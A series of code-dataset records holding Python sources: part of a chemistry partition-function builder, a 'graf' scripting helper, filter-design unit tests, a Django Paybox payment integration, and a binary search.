sym.symmetry_factor(\n pf_filesystems, chn_pf_models, spc_dct_i, rotors,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys)\n\n # Obtain electronic energy levels\n elec_levels = spc_dct_i['elec_levels']\n\n # Obtain energy levels\n print('\\nObtaining the electronic energy...')\n chn_ene = ene.read_energy(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n read_ene=True, read_zpe=False)\n ene_chnlvl = chn_ene + zpe\n\n ene_reflvl = None\n _, _ = ref_pf_models, ref_pf_levels\n # if chn_model == ref_model:\n # ene_reflvl = ene_chnlvl\n # else:\n # ene_reflvl = get_fs_ene_zpe(spc_dct, prod,\n # thy_dct, model_dct, model,\n # save_prefix, saddle=False,\n # read_ene=True, read_zpe=True)\n\n # Create info dictionary\n keys = ['geom', 'sym_factor', 'freqs', 'imag', 'elec_levels',\n 'mess_hr_str', 'mdhr_dat',\n 'xmat', 'rovib_coups', 'rot_dists',\n 'ene_chnlvl', 'ene_reflvl', 'zpe_chnlvl']\n vals = [geom, sym_factor, freqs, imag, elec_levels,\n allr_str, mdhr_dat,\n xmat, rovib_coups, rot_dists,\n ene_chnlvl, ene_reflvl, zpe]\n inf_dct = dict(zip(keys, vals))\n\n return inf_dct\n\n\n# VRCTST\n# def flux_data(spc_dct_i,\n# chn_pf_models, chn_pf_levels,\n# run_prefix, save_prefix):\ndef flux_data():\n \"\"\" Grab the flux file from the filesystem\n \"\"\"\n\n # # Set filesys\n # ts_save_fs, ts_save_path = _ts_filesys(\n # spc_dct, rxn, pf_levels, save_prefix, level='harm')\n\n # # Read the flux file string\n # locs = []\n # flux_str = ts_save_fs[-1].file.flux.read(locs)\n flux_str = 'FLUX STR'\n\n # Create info dictionary\n inf_dct = {'flux_str': flux_str}\n\n return inf_dct\n\n\n# VTST\n# def rpvtst_data(rpath_vals, sadpt=True):\n# \"\"\" Pull all of the neccessary information from the\n# filesystem for a species\n# \"\"\"\n# # Set filesys\n# if sadpt:\n# _, cnf_save_path, _, _ = _cnf_filesys(\n# spc_dct_i, rxn, pf_levels, save_prefix,\n# saddle=saddle, level='harm')\n# scn_save_fs, scn_locs, save_paths = _scn_filesys(\n# cnf_save_path, run_tors_names)\n# else:\n# ts_save_fs, ts_save_path = _ts_filesys(\n# spc_dct, rxn, pf_levels, save_prefix, level='harm')\n# scn_save_fs, scn_locs, save_paths = _scn_filesys(\n# ts_save_path, 
run_tors_names)\n#\n# # Loop over scan filesystem and pull out the values\n# inf_dct_lst = []\n# for locs in scn_locs:\n#\n# # Check if to pull info\n# if locs not in rpath_vals:\n# continue\n#\n# # Get geometry, energy, vibrational freqs, and zpe\n# if scn_save_fs[-1].file.geometry.exists(locs):\n# geom = scn_save_fs[-1].file.geometry.read(locs)\n# else:\n# print('no geom')\n# continue\n# if scn_save_fs[-1].file.energy.exists(locs):\n# sp_save_fs = autofile.fs.single_point(scn_save_path)\n# sp_level = fsorb.mod_orb_restrict(ts_info, ene_thy_level)\n# if sp_save_fs[-1].file.energy.exists(sp_level[1:4]):\n# ene = sp_save_fs[-1].file.energy.read(sp_level[1:4])\n# else:\n# print('no energy')\n# continue\n# else:\n# print('no energy')\n# continue\n# if scn_save_fs[-1].file.hessian.exists(locs):\n# proj_rotors_str = ''\n# hess = scn_save_fs[-1].file.hessian.read(locs)\n# scn_save_path = scn_save_fs[-1].path(locs)\n# freqs, _, _ = vib.projrot_freqs_1(\n# geom, hess,\n# proj_rotors_str,\n# scn_save_path, pot=False, saddle=True)\n# zpe = sum(freqs)*phycon.WAVEN2KCAL/2.\n# else:\n# print('no hessian')\n# continue\n#\n# # Get the relative energy\n# zero_ene = ''\n#\n# # Create info dictionary and append to lst\n# sym_factor = 1.0\n# elec_levels = ts_dct['elec_levels']\n# keys = ['geom', 'sym_factor', 'freqs', 'elec_levels', 'zero_ene']\n# vals = [geom, sym_factor, freqs, elec_levels, zero_ene]\n# inf_dct_lst.append(dict(zip(keys, vals)))\n#\n# return inf_dct_lst\n\n\n# TAU\ndef tau_data(spc_dct_i,\n chn_pf_models, chn_pf_levels,\n run_prefix, save_prefix, saddle=False):\n \"\"\" Read the filesystem to get information for TAU\n \"\"\"\n\n frm_bnd_keys = ()\n brk_bnd_keys = ()\n\n # Set up all the filesystem objects using models and levels\n pf_filesystems = fs.pf_filesys(\n spc_dct_i, chn_pf_levels, run_prefix, save_prefix, saddle)\n [harm_cnf_fs, _,\n harm_min_locs, harm_save, _] = pf_filesystems['harm']\n # [tors_cnf_fs, _, tors_min_locs, _, _] = pf_filesystems['tors']\n\n # Get the conformer filesys for the reference geom and energy\n if harm_min_locs:\n geom = harm_cnf_fs[-1].file.geometry.read(harm_min_locs)\n min_ene = harm_cnf_fs[-1].file.energy.read(harm_min_locs)\n\n # Set the filesystem\n tau_save_fs = autofile.fs.tau(harm_save)\n\n # Set the ground and reference energy to set values for now\n rxn_class = None\n\n # Get the rotor info\n rotors = tors.build_rotors(\n spc_dct_i, pf_filesystems, chn_pf_models, chn_pf_levels,\n rxn_class=rxn_class,\n frm_bnd_keys=frm_bnd_keys, brk_bnd_keys=brk_bnd_keys,\n tors_geo=True)\n\n run_path = fs.make_run_path(pf_filesystems, 'tors')\n tors_strs = tors.make_hr_strings(\n rotors, run_path, chn_pf_models['tors'])\n [_, hr_str, flux_str, prot_str, _] = tors_strs\n\n # Use model to determine whether to read grads and hessians\n vib_model = chn_pf_models['vib']\n freqs = ()\n _, _, proj_zpve, harm_zpve = vib.tors_projected_freqs_zpe(\n pf_filesystems, hr_str, prot_str, saddle=False)\n zpe_chnlvl = proj_zpve * phycon.EH2KCAL\n\n # Set reference energy to harmonic zpve\n reference_energy = harm_zpve * phycon.EH2KCAL\n if vib_model == 'tau':\n tau_locs = [locs for locs in tau_save_fs[-1].existing()\n if tau_save_fs[-1].file.hessian.exists(locs)]\n else:\n tau_locs = tau_save_fs[-1].existing()\n\n # Read the geom, ene, grad, and hessian for each sample\n samp_geoms, samp_enes, samp_grads, samp_hessians = [], [], [], []\n for locs in tau_locs:\n\n # print('Reading tau info at path {}'.format(\n # tau_save_fs[-1].path(locs)))\n\n geo = 
tau_save_fs[-1].file.geometry.read(locs)\n geo_str = autofile.data_types.swrite.geometry(geo)\n samp_geoms.append(geo_str)\n\n tau_ene = tau_save_fs[-1].file.energy.read(locs)\n rel_ene = (tau_ene - min_ene) * phycon.EH2KCAL\n ene_str = autofile.data_types.swrite.energy(rel_ene)\n samp_enes.append(ene_str)\n\n if vib_model == 'tau':\n grad = tau_save_fs[-1].file.gradient.read(locs)\n grad_str = autofile.data_types.swrite.gradient(grad)\n samp_grads.append(grad_str)\n\n hess = tau_save_fs[-1].file.hessian.read(locs)\n hess_str = autofile.data_types.swrite.hessian(hess)\n samp_hessians.append(hess_str)\n\n # Read a geometry, grad, and hessian for a reference geom if needed\n ref_geom, ref_grad, ref_hessian = [], [], []\n if vib_model != 'tau':\n\n # Get harmonic filesystem information\n [harm_save_fs, _, harm_min_locs, _, _] = pf_filesystems['harm']\n\n # Read the geometr, gradient, and Hessian\n geo = harm_save_fs[-1].file.geometry.read(harm_min_locs)\n geo_str = autofile.data_types.swrite.geometry(geo)\n ref_geom.append(geo_str)\n\n grad = harm_save_fs[-1].file.gradient.read(harm_min_locs)\n grad_str = autofile.data_types.swrite.gradient(grad)\n ref_grad.append(grad_str)\n\n hess = harm_save_fs[-1].file.hessian.read(harm_min_locs)\n hess_str = autofile.data_types.swrite.hessian(hess)\n ref_hessian.append(hess_str)\n\n # Obtain symmetry factor\n print('\\nDetermining the symmetry factor...')\n sym_factor = sym.symmetry_factor(\n pf_filesystems, chn_pf_models, spc_dct_i, rotors,\n frm_bnd_keys=(), brk_bnd_keys=())\n\n # Create info dictionary\n keys = ['geom', 'sym_factor', 'elec_levels', 'freqs', 'flux_mode_str',\n 'samp_geoms', 'samp_enes', 'samp_grads', 'samp_hessians',\n 'ref_geom', 'ref_grad', 'ref_hessian',\n 'zpe_chnlvl', 'reference_energy']\n vals = [geom, sym_factor, spc_dct_i['elec_levels'], freqs, flux_str,\n samp_geoms, samp_enes, samp_grads, samp_hessians,\n ref_geom, ref_grad, ref_hessian,\n zpe_chnlvl, reference_energy]\n inf_dct = dict(zip(keys, vals))\n\n return inf_dct\n","sub_path":"routines/pf/models/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"520937283","text":"#!/usr/bin/env python\n# coding=utf-8\nimport pkg_resources\npkg_resources.declare_namespace(__name__)\nversion = pkg_resources.require('graf')[0].version\n\n__all__ = ['version', 'use', 'call']\n\ndef use(environment=None):\n \"\"\"\n Use graf commands in the shell\n\n Args:\n environment: None or a dictionary instance which indicate the variables.\n if this is not specified, globals() of caller will be used.\n \"\"\"\n from graf.plugins import registry\n if not environment:\n import inspect\n frame = inspect.stack()[1][0]\n environment = frame.f_globals\n environment.update(registry.raw)\n\n\ndef call(filename, environment=None):\n \"\"\"\n Call graf script file in this shell\n\n Args:\n filename: a filename of graf script file\n environment: None or a dictionary instance which indicate the variables.\n if this is not specified, globals() of caller will be used.\n \"\"\"\n import os\n import sys\n from graf.plugins import registry\n\n if not environment:\n import inspect\n frame = inspect.stack()[1][0]\n environment = frame.f_globals\n\n # create global variables\n local = environment.copy()\n #local.update(locals())\n local.update(registry.raw)\n\n # call script file\n local['__file__'] = filename\n local['__name__'] = '__main__'\n local['__package__'] = None\n\n # Opne file 
and read content\n with open(filename, 'r') as f: content = f.read()\n # Add directory of filename into PYTHONPATH\n python_path_stored = sys.path\n sys.path = [os.path.dirname(filename)] + sys.path\n # execute\n execfile(filename, local)\n # Remove directory from PYTHONPATH\n sys.path = python_path_stored\n","sub_path":"graf/src/graf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130603902","text":"import unittest\r\nimport filterdesigner.FilterSpec as FilterSpec\r\nimport filterdesigner.FIRDesign as FIRDesign\r\nimport filterdesigner.IIRDesign as IIRDesign\r\nimport scipy.signal as signal\r\nimport numpy as np\r\n\r\nclass TestImpz(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.order = 80\r\n self.cut = 0.5\r\n self.fc = 300\r\n self.fs = 1000\r\n self.n = 1000\r\n\r\n def test_impz_1(self):\r\n # Test case for FIR filter without n\r\n fil = FIRDesign.fir1(self.order, self.cut)\r\n _, yout = FilterSpec.impz(fil)\r\n self.assertTrue(np.all(yout == fil[0]))\r\n\r\n def test_impz_2(self):\r\n # Test case for FIR filter with n\r\n fil = FIRDesign.fir1(self.order, self.cut)\r\n T = np.arange(0, self.n, 1)\r\n x = np.zeros(len(T))\r\n x[0] = 1\r\n yout = signal.lfilter(fil[0], fil[1], x)\r\n tt, y = FilterSpec.impz(fil, n=self.n)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n\r\n def test_impz_3(self):\r\n # Test case for IIR filter without n\r\n fil = IIRDesign.butter(6, self.fc/(self.fs/2))\r\n dl = signal.dlti(fil[0], fil[1], dt=1/self.fs)\r\n i_d = signal.dimpulse(dl)\r\n T = i_d[0]\r\n yout = i_d[1][0]\r\n tt, y = FilterSpec.impz(fil, fs=self.fs)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n \r\n def test_impz_4(self):\r\n # Test case for IIR filter with n\r\n fil = IIRDesign.butter(6, self.fc/(self.fs/2))\r\n dl = signal.dlti(fil[0], fil[1], dt=1/self.fs)\r\n i_d = signal.dimpulse(dl, n=self.n)\r\n T = i_d[0]\r\n yout = i_d[1][0]\r\n tt, y = FilterSpec.impz(fil, n=self.n, fs=self.fs)\r\n self.assertTrue(np.all(tt == T) and np.all(y == yout))\r\n","sub_path":"filterdesigner/tests/test_impz.py","file_name":"test_impz.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321627141","text":"import base64\nimport binascii\nimport datetime\nimport hashlib\nimport hmac\nfrom urllib.parse import parse_qs, urlparse\n\nimport requests\n\nfrom .exceptions import InvalidParametersException, PayboxEndpointException\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom django.conf import settings\n\n\nclass PayboxSystemTransaction:\n \"\"\"A Paybox System transaction, from your server to the customer's browser, and from Paybox server to yours\n Attributes:\n REQUIRED The values nedded to call for a payment\n OPTIONAL The values you may add to modify Paybox behavior\n RESPONSE_CODES Every response code Paybox may return after a payment attempt\n \"\"\"\n\n def __init__(\n self,\n production=False,\n total=None,\n cmd=None,\n porteur=None,\n time=None,\n repondre_a=None,\n refuse=None,\n effectue=None,\n annule=None,\n attente=None,\n langue=None,\n hash=None,\n devise=None,\n subscription=False,\n subscription_amount=None,\n nbpaie=None,\n freq=None,\n quand=None,\n delais=None,\n several_payments=False,\n mont1=None,\n date1=None,\n mont2=None,\n date2=None,\n mont3=None,\n 
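# the montX/dateX pairs above and below feed PBX_2MONTx/PBX_DATEx for spread payments\n            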
date3=None,\n            authorize_without_capture=False,\n            diff=None,\n            paybox_system_standard=False,\n            paybox_system_light=False,\n            paybox_system_mobile=False,\n            secure_3d=False,\n            card_verification_browser_redirect_url=None\n    ):\n        self.production = production\n        self.subscription = subscription\n        self.several_payments = several_payments\n        self.authorize_without_capture = authorize_without_capture\n        self.paybox_system_standard = paybox_system_standard\n        self.paybox_system_light = paybox_system_light\n        self.paybox_system_mobile = paybox_system_mobile\n        self.secure_3d = secure_3d\n        self.card_verification_api_redirect_url = card_verification_browser_redirect_url\n\n        if self.production:\n            self.action_url = \"https://tpeweb.e-transactions.fr/php/\"\n            self.KEY = settings.PAYBOX_PUBLIC_KEY\n        else:\n            self.action_url = \"https://preprod-tpeweb.e-transactions.fr/php/\"\n            self.KEY = settings.PAYBOX_TEST_PUBLIC_KEY\n\n        self.SUPPORTED_HASH_ALGORITHMS = [\n            \"SHA512\",\n            \"SHA224\",\n            \"SHA256\",\n            \"SHA384\"\n        ]\n\n        self.REQUIRED = {\n            \"PBX_SITE\": settings.PAYBOX_SITE,  # SITE NUMBER (given by Paybox)\n            \"PBX_RANG\": settings.PAYBOX_RANG,  # RANG NUMBER (given by Paybox)\n            \"PBX_IDENTIFIANT\": settings.PAYBOX_IDENTIFIANT,  # IDENTIFIANT NUMBER (given by Paybox)\n            \"PBX_TOTAL\": total,  # Total amount of the transaction, in cents\n            \"PBX_DEVISE\": devise if devise else \"978\",  # Currency of the transaction\n            \"PBX_CMD\": cmd,  # Transaction reference generated by the ecommerce\n            \"PBX_PORTEUR\": porteur,  # Customer's email address\n            \"PBX_RETOUR\": \"TO:M;RE:R;AU:A;RC:E;SIGN:K\",  # List of the variables Paybox must return to the IPN url\n            \"PBX_HASH\": hash if hash and hash in self.SUPPORTED_HASH_ALGORITHMS else \"SHA512\",  # Hash algorithm used to calculate the Hmac value\n            \"PBX_TIME\": time if time else datetime.datetime.utcnow().isoformat(),  # Time of the transaction (iso 8601 format)\n        }\n\n        self.OPTIONAL = {\n            \"PBX_REFUSE\": refuse,  # return url when the payment is refused\n            \"PBX_REPONDRE_A\": repondre_a,  # IPN url. WARNING: keep the trailing slash, otherwise Django 301-redirects to it...\n            \"PBX_EFFECTUE\": effectue,  # return url on success\n            \"PBX_ANNULE\": annule,  # return url when the customer cancels\n            \"PBX_ATTENTE\": attente,  # return url while the payment is pending\n            \"PBX_LANGUE\": langue if langue else \"GBR\",  # 3 chars. payment language. GBR for English\n            \"PBX_DIFF\": diff\n        }\n\n        self.SUBSCRIPTION = {\n            \"PBX_2MONT\": subscription_amount,  # Amount of the next term of payment in cents. 0 takes amount in PBX_TOTAL\n            \"PBX_NBPAIE\": nbpaie,  # Number of subsequent subscription payments. 0 is never ending\n            \"PBX_FREQ\": freq,  # Frequency of payments in months\n            \"PBX_QUAND\": quand,  # Day of month for the payment to be executed\n            \"PBX_DELAIS\": delais,  # Number of days to delay before the first payment is executed\n        }\n\n        self.SEVERAL_PAYMENTS = {\n            \"PBX_2MONT1\": mont1,\n            \"PBX_DATE1\": date1,\n            \"PBX_2MONT2\": mont2,\n            \"PBX_DATE2\": date2,\n            \"PBX_2MONT3\": mont3,\n            \"PBX_DATE3\": date3\n        }\n\n        self.RESPONSE_CODES = {\n            \"00000\": \"Success\",\n            \"00001\": \"Connection failed. Make a new attempt at tpeweb1.paybox.com\",\n            \"001xx\": \"Payment rejected\",\n            \"00003\": \"Paybox error. Make a new attempt at tpeweb1.paybox.com\",\n            \"00004\": \"Card number invalid\",\n            \"00006\": \"site, rang, or identifiant invalid. 
Connection rejected\",\n \"00008\": \"Card expiration date invalid\",\n \"00009\": \"Error while creating a subscription\",\n \"00010\": \"Unrecognized currency\",\n \"00011\": \"Incorrect amount\",\n \"00015\": \"Payment already done\",\n \"00016\": \"Subscriber already known\",\n \"00021\": \"Unauthorized card\",\n \"00029\": \"Incorrect card number\",\n \"00030\": \"Time out\",\n \"00031\": \"Reserved\",\n \"00032\": \"Reserved\",\n \"00033\": \"Country not supported\",\n \"00040\": \"3DSecure validation failed\",\n \"99999\": \"Payment on hold\",\n }\n\n self.PAYBOX_SYSTEM_MODES = [\n \"paybox_system_standard\",\n \"paybox_system_light\",\n \"paybox_system_mobile\"\n ]\n\n def payment_mode(self):\n try:\n if settings.PAYBOX_SYSTEM_MODE:\n if settings.PAYBOX_SYSTEM_MODE in self.PAYBOX_SYSTEM_MODES:\n return settings.PAYBOX_SYSTEM_MODE\n else:\n if self.paybox_system_mobile:\n return \"paybox_system_mobile\"\n elif self.paybox_system_light:\n return \"paybox_system_light\"\n else:\n return \"paybox_system_standard\"\n except AttributeError:\n return \"paybox_system_standard\"\n\n def endpoint_url(self):\n payment_mode = self.payment_mode()\n if payment_mode == \"paybox_system_mobile\":\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/ChoixPaiementMobile.cgi\"\n elif payment_mode == \"paybox_system_light\":\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/MYframepagepaiement_ip.cgi\"\n else:\n if self.production:\n main_url = \"https://tpeweb.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n backup_url = \"https://tpeweb1.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n request = requests.get(main_url)\n if request.status_code == 200:\n return main_url\n else:\n request = requests.get(backup_url)\n if request.status_code == 200:\n return backup_url\n else:\n return \"https://preprod-tpeweb.paybox.com/cgi/MYchoix_pagepaiement.cgi\"\n\n def remote_mpi_url(self):\n if self.production:\n mpi_url1 = \"https://tpeweb.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url2 = \"https://tpeweb1.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url3 = \"https://tpeweb1.paybox.com/cgi/RemoteMPI.cgi\"\n mpi_url4 = \"https://tpeweb0.paybox.com/cgi/RemoteMPI.cgi\"\n request = requests.get(mpi_url1)\n if request.status_code == 200:\n return mpi_url1\n else:\n request = requests.get(mpi_url2)\n if request.status_code == 200:\n return mpi_url2\n else:\n request = requests.get(mpi_url3)\n if request.status_code == 200:\n return mpi_url3\n else:\n request = requests.get(mpi_url4)\n if request.status_code == 200:\n return mpi_url4\n else:\n remote_mpi_url = \"https://preprod-tpeweb.paybox.com/cgi/RemoteMPI.cgi\"\n return remote_mpi_url\n raise PayboxEndpointException(message=\"Paybox MPI URL is not responsive.\")\n\n def remote_mpi_authenticate(self, session_id):\n \"\"\"\n To carry out a 3D-Secure transaction, merchants will need to 
authenticate the cardholder before\n        calling Paybox Direct Applications.\n        :return: {\"ID3D\": \"\", \"StatusPBX\": \"\", \"Check\": \"\", \"IdSession\": \"\", \"3DCAVV\": \"\",\n                 \"3DCAVVALGO\": \"\", \"3DECI\": \"\", \"3DENROLLED\": \"\", \"3DERROR\": \"\", \"3DSIGNVAL\": \"\",\n                 \"3DSTATUS\": \"\", \"3DXID\": \"\"}\n        \"\"\"\n        card_verification_params = {\n            \"IdSession\": session_id,\n            \"IdMerchant\": settings.PAYBOX_IDENTIFIANT,\n            \"URLRetour\": self.card_verification_api_redirect_url,\n            \"Amount\": self.REQUIRED['PBX_TOTAL'],\n            \"Currency\": self.REQUIRED['PBX_DEVISE'],\n            # this class never stores card data in its PBX_* dicts, so the card\n            # fields are read as optional values a caller may have supplied\n            \"CCExpDate\": self.OPTIONAL.get('DATEVAL'),\n            \"CCNumber\": self.OPTIONAL.get('PORTEUR'),\n            \"CVVCode\": self.OPTIONAL.get('CVV')\n        }\n        remote_mpi_call = requests.post(self.remote_mpi_url(), data=card_verification_params)\n        return remote_mpi_call.text\n\n    def post_to_paybox(self):\n        \"\"\"\n        Returns the Paybox action url, required request variables, and the\n        optional variables\n        :return: {\n            \"action\": self.action_url,\n            \"required\": self.required,\n            \"optional\": self.optional,\n        }\n        \"\"\"\n        if self.secure_3d:\n            if getattr(self, 'id3d', None) is None:\n                raise InvalidParametersException(message=\"3D Secure payments require mpi authentication.\")\n        if self.REQUIRED[\"PBX_HASH\"] not in self.SUPPORTED_HASH_ALGORITHMS:\n            raise InvalidParametersException(message=\"Unsupported hash algorithm provided.\")\n        self.REQUIRED[\"PBX_DEVISE\"] = self.REQUIRED.get(\"PBX_DEVISE\") or \"978\"\n        if self.authorize_without_capture:\n            self.OPTIONAL[\"PBX_AUTOSEULE\"] = 'O'\n        # string to sign. Made of the required variables in a precise order.\n        tosign = (\n            \"PBX_SITE=%(PBX_SITE)s&PBX_RANG=%(PBX_RANG)s&PBX_IDENTIFIANT=%(PBX_IDENTIFIANT)s&PBX_TOTAL=%(PBX_TOTAL)s&PBX_DEVISE=%(PBX_DEVISE)s&PBX_CMD=%(PBX_CMD)s&PBX_PORTEUR=%(PBX_PORTEUR)s&PBX_RETOUR=%(PBX_RETOUR)s&PBX_HASH=%(PBX_HASH)s&PBX_TIME=%(PBX_TIME)s\"\n            % self.REQUIRED\n        )\n        # Subscription variables\n        if self.subscription:\n            for key, value in self.SUBSCRIPTION.items():\n                if value:\n                    tosign += \"&\" + key + \"=\" + value\n        # Several payments\n        if self.several_payments:\n            for key, value in self.SEVERAL_PAYMENTS.items():\n                if value:\n                    tosign += \"&\" + key + \"=\" + value\n        # Optional variables\n        for key, value in self.OPTIONAL.items():\n            if value:\n                tosign += \"&\" + key + \"=\" + value\n\n        binary_key = binascii.unhexlify(self.KEY)\n        algorithms = {\n            \"SHA512\": hashlib.sha512,\n            \"SHA224\": hashlib.sha224,\n            \"SHA256\": hashlib.sha256,\n            \"SHA384\": hashlib.sha384\n        }\n        chosen_algorithm = algorithms.get(self.REQUIRED['PBX_HASH'])\n        signature = (\n            hmac.new(binary_key, tosign.encode(\"ascii\"), chosen_algorithm)\n            .hexdigest()\n            .upper()\n        )\n        self.REQUIRED[\"hmac\"] = signature\n\n        return {\n            \"action\": self.endpoint_url(),\n            \"required\": self.REQUIRED,\n            \"optional\": self.OPTIONAL,\n        }\n\n    def construct_html_form(self):\n        \"\"\" Returns an html form ready to be used (string)\n        \"\"\"\n        subscription_fields = \"\\n\".join(\n            [\n                \"<input type='hidden' name='{0}' value='{1}' />\".format(\n                    field, self.SUBSCRIPTION[field]\n                )\n                for field in self.SUBSCRIPTION\n                if self.SUBSCRIPTION[field]\n            ]\n        )\n\n        optional_fields = \"\\n\".join(\n            [\n                \"<input type='hidden' name='{0}' value='{1}' />\".format(\n                    field, self.OPTIONAL[field]\n                )\n                for field in self.OPTIONAL\n                if self.OPTIONAL[field]\n            ]\n        )\n\n        html = \"\"\"<form method='POST' action='{action}'>\n        <input type='hidden' name='PBX_SITE' value='{required[PBX_SITE]}' />\n        <input type='hidden' name='PBX_RANG' value='{required[PBX_RANG]}' />\n        <input type='hidden' name='PBX_IDENTIFIANT' value='{required[PBX_IDENTIFIANT]}' />\n        <input type='hidden' name='PBX_TOTAL' value='{required[PBX_TOTAL]}' />\n        <input type='hidden' name='PBX_DEVISE' value='{required[PBX_DEVISE]}' />\n        <input type='hidden' name='PBX_CMD' value='{required[PBX_CMD]}' />\n        <input type='hidden' name='PBX_PORTEUR' value='{required[PBX_PORTEUR]}' />\n        <input type='hidden' name='PBX_RETOUR' value='{required[PBX_RETOUR]}' />\n        <input type='hidden' name='PBX_HASH' value='{required[PBX_HASH]}' />\n        <input type='hidden' name='PBX_TIME' value='{required[PBX_TIME]}' />\n        <input type='hidden' name='PBX_HMAC' value='{required[hmac]}' />\n        {subscription}\n        {optional}\n        <input type='submit' value='Pay' />\n        
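<!-- the hidden PBX_* fields mirror self.REQUIRED; call post_to_paybox() first so required[hmac] exists -->\n        </form>\n        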
\"\"\"\n\n return html.format(\n action=self.endpoint_url(), required=self.REQUIRED, optional=optional_fields,\n subscription=subscription_fields\n )\n\n def verify_ipn(self, response_url, total, verify_certificate=True):\n \"\"\" Verifies the notification sent by Paybox to your server.\n It verifies :\n - the authenticity of the message\n - the fact that the message has not been altered\n - if not in production, the auth_number must be \"XXXXXX\"\n - if in production, there must be a Response Code\n - the total returned must be equal to the total of the order you've saved in ddb\n :response_url: (string), the full response url with its encoded args\n :order_total': (int), the total amount required\n :verify_certificate: (bool)\n It returns a dict which contains three variables:\n - success, (bool) True if the payment is valid\n - status, (str) The Paybox Response Code\n - auth_code, (str) The Authorization Code generated by the Authorization Center\n \"\"\"\n\n url_parsed = urlparse(response_url)\n message = url_parsed.query\n query = parse_qs(message)\n\n if verify_certificate:\n self.verify_certificate(message=message, signature=query[\"SIGN\"][0])\n\n if not self.production:\n assert query[\"AU\"][0] == \"XXXXXX\", \"Incorrect Test Authorization Code\"\n else:\n assert \"RC\" in query, \"No Response Code Returned\"\n\n assert query[\"TO\"][0] == str(\n total\n ), \"Total does not match. PBX: %s - CMD: %s\" % (\n query[\"TO\"][0],\n str(total),\n )\n\n return {\n \"success\": True if query[\"RC\"][0] == \"00000\" else False,\n \"status\": self.RESPONSE_CODES.get(\n query[\"RC\"][0][:-2] + \"xx\",\n self.RESPONSE_CODES.get(query[\"RC\"][0], \"Unrecognized Response Code\"),\n ),\n \"auth_code\": query[\"AU\"][0] if \"AU\" in query else False,\n }\n\n def verify_certificate(self, message, signature):\n \"\"\" Verifies the Paybox certificate, authenticity and alteration.\n If everything goes well, returns True. 
Otherwise raises an error.\n        :message: (str), the full url with its args\n        :signature: (str), the signature of the message, separated from the url\n        Flow:\n        - The signature is decoded base64\n        - The signature is removed from the message\n        - The Paybox pubkey is loaded from an external file\n        - its validity is checked\n        - The message is digested by SHA1\n        - The SHA1 message is verified against the binary signature\n        \"\"\"\n\n        # detach the signature from the message\n        message_without_sign = message.split(\"&SIGN=\")[0]\n        # decode base64 the signature\n        binary_signature = base64.b64decode(signature)\n        # create a pubkey object\n        if self.production:\n            key = RSA.importKey(\n                settings.PAYBOX_PUBLIC_KEY\n            )\n        else:\n            key = RSA.importKey(\n                settings.PAYBOX_TEST_PUBLIC_KEY if settings.PAYBOX_TEST_PUBLIC_KEY else \"0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\"\n            )\n        # digest the message\n        h = SHA.new(bytes(message_without_sign, encoding=\"utf8\"))\n        # and verify the signature\n        verifier = PKCS1_v1_5.new(key)\n        assert verifier.verify(h, binary_signature), \"Signature Verification Failed\"\n\n        return True\n\n","sub_path":"example_paybox/paybox_test/paybox_system.py","file_name":"paybox_system.py","file_ext":"py","file_size_in_byte":18832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"399299019","text":"def binary_search(sequence, target):\n    sequence = sorted(sequence)\n\n    left = 0\n    right = len(sequence) - 1  # inclusive upper bound; len(sequence) would run past the end\n\n    while left <= right:\n        middle = (left + right) // 2\n        if sequence[middle] < target:\n            left = middle + 1\n        elif sequence[middle] > target:\n            right = middle - 1\n        else:\n            return middle\n    return None\n\n\nif __name__ == \"__main__\":\n    PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61]\n    res = binary_search(PRIMES, 59)\n    print(res)","sub_path":"40/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
